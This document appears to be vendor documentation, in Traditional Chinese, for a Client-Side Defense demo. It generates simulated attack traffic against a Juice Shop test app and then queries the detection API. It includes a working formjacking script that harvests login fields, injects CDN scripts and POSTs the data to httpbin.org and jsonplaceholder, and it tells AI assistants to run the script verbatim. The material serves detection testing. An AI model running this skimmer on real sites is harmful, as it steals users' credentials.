階段 2 — 攻擊

階段 2 針對受保護應用程式產生模擬攻擊流量，並確認 CSD 已偵測到該流量。在繼續之前，階段 1 必須完成——所有步驟 7 的檢查均為 PASS。

步驟 8：攻擊模擬

注意

此步驟需要在瀏覽器端執行 JavaScript——curl 無法觸發 CSD 偵測。具有瀏覽器自動化工具（MCP Chrome DevTools、Playwright、Puppeteer）的 AI 助理可使用下方的 AI 自動化執行序列直接執行這些步驟。沒有瀏覽器自動化工具的操作員請執行手動步驟。

基礎設施驗證完成後（所有階段 1 步驟 7 的檢查均為 PASS），執行攻擊模擬腳本以產生 CSD 偵測結果。腳本定義於觸發偵測指南和攻擊腳本庫中。

AI 自動化執行

具有瀏覽器自動化工具的 AI 助理可以程式化方式執行攻擊模擬：

1. 使用 initScript 導覽 — 先導覽至 about:blank 以確保乾淨的文件上下文（避免前次導覽殘留的 initScript），然後使用 navigate_page 導覽至 http://$F5XC_DOMAINNAME/#/login，並附上一個 initScript，該腳本會在 zone.js 修補之前儲存原生的 setInterval、clearInterval、fetch 和 console.log，輪詢登入表單欄位，透過原生 HTMLInputElement.prototype.value setter 填入憑證，並立即以內嵌方式執行組合偵測腳本。請使用下方的逐字 initScript。
2. 關閉歡迎橫幅 — 使用 Escape 鍵執行 press_key 以關閉歡迎橫幅。後續造訪時橫幅可能不會出現（Cookie 已持久化）。Cookie 同意對話框會由 Escape 鍵自動關閉。
3. 等待完成 — 等待 10 秒，讓所有 CDN 腳本載入/錯誤回呼及 fetch Promise 解析完成。
4. 擷取證據 — 使用 list_console_messages 檢查是否有 [CSD Demo] Simulation complete 及 CDN 載入結果；使用 list_network_requests 篩選 script 和 fetch 類型，以驗證 HTTP 狀態碼（成功為 200/201，保留中的請求為 pending）。

階段 2 initScript（逐字使用——請完全按照原文）：

// Save native references before zone.js patches them
var _si = window.setInterval.bind(window);
var _ci = window.clearInterval.bind(window);
var _fetch = window.fetch.bind(window);
var _log = window.console.log.bind(window.console);

// Poll for login form fields, fill credentials, run detection script
var _poll = _si(function() {
  var emailEl = document.querySelector('#email');
  var passEl  = document.querySelector('#password');
  if (emailEl && passEl) {
    _ci(_poll);
    // Fill credentials via native setter (bypasses zone.js)
    var nativeSet = Object.getOwnPropertyDescriptor(
      window.HTMLInputElement.prototype, 'value').set;
    nativeSet.call(emailEl, 'test@example.com');
    emailEl.dispatchEvent(new Event('input', { bubbles: true }));
    nativeSet.call(passEl, 'P@ssword123');
    passEl.dispatchEvent(new Event('input', { bubbles: true }));

    // Run Combined Detection Script inline using native fetch for exfil
    (function() {
      _log('==================================================');
      _log('[CSD Demo] Combined Detection Script — Starting');
      _log('==================================================');

      _log('\n[Formjack] Phase 1: Form field harvesting');
      var inputs = document.querySelectorAll('input');
      var harvested = {};
      inputs.forEach(function(input) {
        var name = input.name || input.id || input.type;
        harvested[name] = input.value || '(empty)';
      });
      _log('[Formjack] Harvested ' + Object.keys(harvested).length + ' fields:', harvested);

      _log('\n[Supply Chain] Phase 2: Multi-CDN script injection');
      var cdns = [
        { url: 'https://cdn.jsdelivr.net/npm/lodash@4.17.21/lodash.min.js', name: 'jsdelivr' },
        { url: 'https://esm.sh/moment@2.30.1', name: 'esm.sh' },
        { url: 'https://unpkg.com/underscore@1.13.7/underscore-min.js', name: 'unpkg' },
        { url: 'https://ga.jspm.io/npm:dayjs@1.11.13/dayjs.min.js', name: 'jspm' }
      ];
      cdns.forEach(function(cdn) {
        var script = document.createElement('script');
        script.src = cdn.url;
        script.onload = function() { _log('[Supply Chain] Loaded from ' + cdn.name + ': ' + cdn.url); };
        script.onerror = function() { _log('[Supply Chain] Blocked/failed from ' + cdn.name + ': ' + cdn.url); };
        document.head.appendChild(script);
        _log('[Supply Chain] Injected script tag: ' + cdn.name);
      });

      _log('\n[Exfil] Phase 3: Data exfiltration');
      var payload = JSON.stringify({
        type: 'combined_demo', credentials: harvested,
        page: window.location.href, timestamp: Date.now()
      });
      _fetch('https://www.httpbin.org/post', { method: 'POST', mode: 'no-cors', body: payload })
        .then(function() { _log('[Exfil] Data sent to www.httpbin.org'); });
      _fetch('https://jsonplaceholder.typicode.com/posts', {
        method: 'POST', mode: 'no-cors',
        headers: { 'Content-Type': 'application/json' }, body: payload
      }).then(function() { _log('[Exfil] Data sent to jsonplaceholder.typicode.com'); });

      _log('\n==================================================');
      _log('[CSD Demo] Simulation complete');
      _log('[CSD Demo] Fields harvested: ' + Object.keys(harvested).length);
      _log('[CSD Demo] Scripts injected: 4 (4 CDN domains)');
      _log('[CSD Demo] Exfil channels: 2 (fetch POST)');
      _log('==================================================');
    })();
  }
}, 300);

警告

zone.js 不相容性 — Juice Shop 使用 Angular 的 zone.js，該套件會修補 setTimeout、setInterval、fetch、XMLHttpRequest 及其他瀏覽器 API。這會導致 MCP 的 evaluate_script、fill 和 click 工具出現 Cannot read properties of undefined (reading 'call') 錯誤。請改用帶有 initScript 的 navigate_page——initScript 會在 zone.js 載入之前執行，因此您可以儲存原生 API 參考並在輪詢回呼中使用它們。initScript 必須使用原生的 HTMLInputElement.prototype.value setter 填入表單欄位（而非 fill），並以內嵌方式執行偵測腳本（而非透過 setTimeout，因為 zone.js 可能在頁面載入後攔截它）。詳情請參閱觸發偵測 — AI 自動化執行。

注意

initScript 累積 — 每次帶有 initScript 參數的 navigate_page 呼叫都會將腳本加入一個持久清單，該清單會在每次後續文件載入時執行。為避免殘留腳本造成干擾，請在每次執行之間導覽至 about:blank，或使用帶有 isolatedContext 的 new_page 取得乾淨的瀏覽器上下文。

注意

在 initScript 中儲存原生 fetch — initScript 會在 zone.js 修補之前儲存 window.fetch.bind(window)。這可確保 fetch 呼叫正常運作，不會出現 zone.js 的 Cannot read properties of undefined 錯誤。同一個 initScript（已儲存原生 fetch）同時用於階段 2 和階段 3 的攻擊執行——CSD 緩解措施不會攔截 fetch() 呼叫，因此儲存原生參考不會影響緩解行為。

警告

暫時性來源 404 — 首次導覽至 Angular 應用程式時，polyfills.js 或其他應用程式腳本可能從來源伺服器回傳暫時性的 HTTP 404。這會導致 Angular 引導失敗，產生空白頁面且無法顯示登入表單。此 404 是短暫性的——後續請求將回傳 200 或 304。恢復方式： 導覽至 about:blank，等待 2 秒，然後重試導覽。若問題在多次重試後仍然存在，請透過負載平衡器路徑檢查來源健康狀態（curl -s -o /dev/null -w '%{http_code}' http://$F5XC_DOMAINNAME/polyfills.js）。

手動執行

沒有瀏覽器自動化工具的操作員請手動執行以下步驟：

1. 導覽至受保護應用程式的登入頁面：http://xF5XC_DOMAINNAMEx/#/login
2. 輸入虛擬憑證 — 在電子郵件欄位輸入 test@example.com，在密碼欄位輸入 P@ssword123（請勿提交表單）
3. 開啟開發人員工具 — 按下 F12 並切換至主控台分頁
4. 執行組合偵測腳本 — 將觸發偵測 — 執行組合模擬腳本中的腳本貼入主控台並按下 Enter
5. 驗證主控台輸出 — 確認 [CSD Demo] 的分階段輸出顯示：欄位收割、從 4 個 CDN 網域注入腳本，以及向 2 個端點的資料外洩

觸發的內容

訊號	行為	偵測
表單欄位收割	讀取電子郵件和密碼輸入值	讀取敏感表單欄位的腳本——標記為高風險
腳本注入	從 cdn.jsdelivr.net、esm.sh、unpkg.com、ga.jspm.io 注入 4 個 <script> 標籤	偵測到最多 4 個新的第三方腳本網域（CDN 可用性因情況而異）
資料外洩	透過 fetch 將收割的資料傳送至 www.httpbin.org 和 jsonplaceholder.typicode.com	偵測到對外部網域的網路呼叫

注意

CDN 可用性因情況而異。 並非所有 4 個 CDN 腳本都能在每次執行時成功載入——瀏覽器資源限制、網路狀況或 CDN 速率限制可能導致部分腳本以 ERR_INSUFFICIENT_RESOURCES 失敗或逾時。只要任何 CDN 腳本成功載入，模擬即視為成功。無論腳本是否成功載入，CSD 均會偵測注入嘗試——<script> 標籤的建立本身即為偵測訊號。

在嚴重情況下，ERR_INSUFFICIENT_RESOURCES 可能升級為頁面層級故障——整個頁面變為空白、截圖逾時，且 take_snapshot 失敗。這通常發生在同一瀏覽器上下文中多次導覽並累積大量 initScript 之後。恢復方式： 使用帶有 isolatedContext 的 new_page 建立全新的瀏覽器上下文，然後從 about:blank → 帶有 initScript 的 navigate_page 序列重試。這與個別 CDN 腳本失敗不同，後者不影響模擬成功與否。

提示

執行攻擊模擬後，使用此確定性輪詢迴圈等待偵測結果：

1. 每 60 秒查詢一次 /detected_domains
2. 若 DET-3 通過（外洩網域出現在 /detected_domains 中），立即繼續至步驟 9
3. 若 10 次查詢後（10 分鐘）仍為空，請檢查 CSD 狀態（階段 1 步驟 5）和受保護網域註冊（階段 1 步驟 6）——其中一項可能設定有誤
4. 若 30 次查詢後（30 分鐘）仍為空，請停止並向操作員回報——不要繼續至階段 3

如需其他針對性模擬（個別攻擊類別、最大偵測壓力測試），請參閱攻擊腳本庫。

證據

AI 助理應回報以下內容。對於 AI 自動化執行，證據透過 list_console_messages 以程式化方式擷取（initScript 的輪詢函數會將結果記錄至主控台）。對於手動執行，操作員讀取瀏覽器主控台輸出。

檢查項目	預期結果	狀態
登入頁面已載入	http://$F5XC_DOMAINNAME/#/login 回傳 200 OK	PASS / FAIL
主控台腳本已執行	主控台輸出中出現 [CSD Demo] Simulation complete	PASS / FAIL
欄位已收割	主控台輸出中的數量 > 0	PASS
腳本已注入	主控台輸出中出現 1–4 個 CDN 網域（部分可能因資源錯誤而失敗）	若出現任何 CDN 網域則為 PASS
外洩通道	主控台輸出中出現 2 個 fetch POST 嘗試	PASS

提示

若 HTTPS 負載平衡器憑證有效（CertificateValid），您也可以選擇對 https://$F5XC_DOMAINNAME/#/login 執行模擬。這並非示範進程所必需。

步驟 9：透過 API 驗證偵測結果

查詢 CSD API 端點以確認偵測結果已出現。使用輪詢迴圈：每 60 秒查詢一次 /detected_domains；一旦 DET-3 通過即可繼續。若 DET-3 在 10 分鐘後仍未通過，請檢查 CSD 設定。若 DET-3 在 30 分鐘後仍未通過，請停止並向操作員回報。這些端點記錄於 API 參考中，使用與前述步驟相同的驗證方式和命名空間。

注意

端點處理順序： /detected_domains 最先填入資料，是 CSD 管道正常運作的主要指標。/scripts 和 /formFields 依據較慢的後端處理排程填入，即使在多次模擬執行後，可能仍需 20–30 分鐘才會有資料。若 /detected_domains 顯示外洩網域（www.httpbin.org、jsonplaceholder.typicode.com），請視模擬為已成功偵測並繼續——下方的 DET-1 檢查即反映此情況。

已偵測的腳本

查詢過去 24 小時內偵測到的腳本：

NOW=$(date +%s)
START=$(( NOW - 86400 ))
curl -s -X POST \
  -H "Authorization: APIToken xF5XC_API_TOKENx" \
  -H "Content-Type: application/json" \
  -d "{\"startTime\": \"$START\", \"endTime\": \"$NOW\"}" \
  "xF5XC_API_URLx/api/shape/csd/namespaces/xF5XC_NAMESPACEx/scripts" \
  | jq '{total: (.scripts | length), scripts: [.scripts[]? | {script_name: .script_name, risk_level: .risk_level}]}'

欄位	預期結果	狀態
total	> 0（已偵測到腳本）	若 > 0 則為 PASS；若為 0 但 /detected_domains 顯示外洩網域則為 PENDING
腳本名稱	script_name 中包含 CDN 網域（cdn.jsdelivr.net、esm.sh、unpkg.com、ga.jspm.io）	若注入的 CDN 網域出現則為 PASS

已偵測的網域

curl -s \
  -H "Authorization: APIToken xF5XC_API_TOKENx" \
  "xF5XC_API_URLx/api/shape/csd/namespaces/xF5XC_NAMESPACEx/detected_domains" \
  | jq '{total_domains: .domain_summary.totalDomains, domains: [.domains_list[]? | {domain: .domain, category: .category}]}'

欄位	預期結果	狀態
total_domains	> 0	若 > 0 則為 PASS
網域清單	包含 CDN 和外洩網域	若預期網域出現則為 PASS

表單欄位

NOW=$(date +%s)
START=$(( NOW - 86400 ))
curl -s \
  -H "Authorization: APIToken xF5XC_API_TOKENx" \
  "xF5XC_API_URLx/api/shape/csd/namespaces/xF5XC_NAMESPACEx/formFields?startTime=$START&endTime=$NOW" \
  | jq '{total: .total_size, fields: [.form_fields[]? | {name: .name, sensitivity: .analysis.value, scripts: (.associated_scripts | length), locations: .locations}]}'

欄位	預期結果	狀態
total	> 0	若 > 0 則為 PASS；若為 0 但 DET-3 通過則為 PENDING
name	包含 email、password	若敏感欄位出現則為 PASS
sensitivity	電子郵件/密碼欄位為 Sensitive	若 ML 分類正確則為 PASS

注意

表單欄位的處理速度慢於網域偵測。 /formFields 端點在首次查詢時可能回傳含有部分中繼資料的欄位。ML 敏感度分類（Sensitive 與 Not Sensitive）會在後端處理完成後才填入——這可能在首次模擬執行後需要 20–30 分鐘。若欄位已顯示但缺乏分類，請稍後重新查詢。DET-3（/detected_domains）是主要通過標準。

階段 2 證據摘要

完成所有偵測查詢後，呈現最終偵測狀態：

測試 ID	檢查項目	狀態
DET-1	已偵測到腳本（/scripts 端點）	若 > 0 則為 PASS；若為空但 DET-3 通過則為 PENDING
DET-2	已偵測到 CDN 網域	PASS / FAIL
DET-3	已偵測到外洩網域（/detected_domains）	主要指標 — 若 www.httpbin.org 或 jsonplaceholder.typicode.com 出現則為 PASS
DET-4	已偵測到表單欄位（/formFields 端點）	若 > 0 則為 PASS；若為空但 DET-3 通過則為 PENDING

注意

繼續至階段 3 的最低通過標準： DET-3 必須為 PASS（外洩網域在 /detected_domains 中可見）。DET-1 和 DET-4 在首次使用或全新重建後可能顯示 PENDING——這是正常現象。若 DET-3 在 30 分鐘後仍顯示 FAIL，請確認 CSD 已啟用（階段 1 步驟 5）、受保護網域已註冊（階段 1 步驟 6），以及 CSD JS 標籤正在被注入（階段 1 步驟 7 JS 設定檢查）。

---

階段 2 完成。 請繼續至階段 3 — 緩解以套用緩解規則並驗證網域已被封鎖。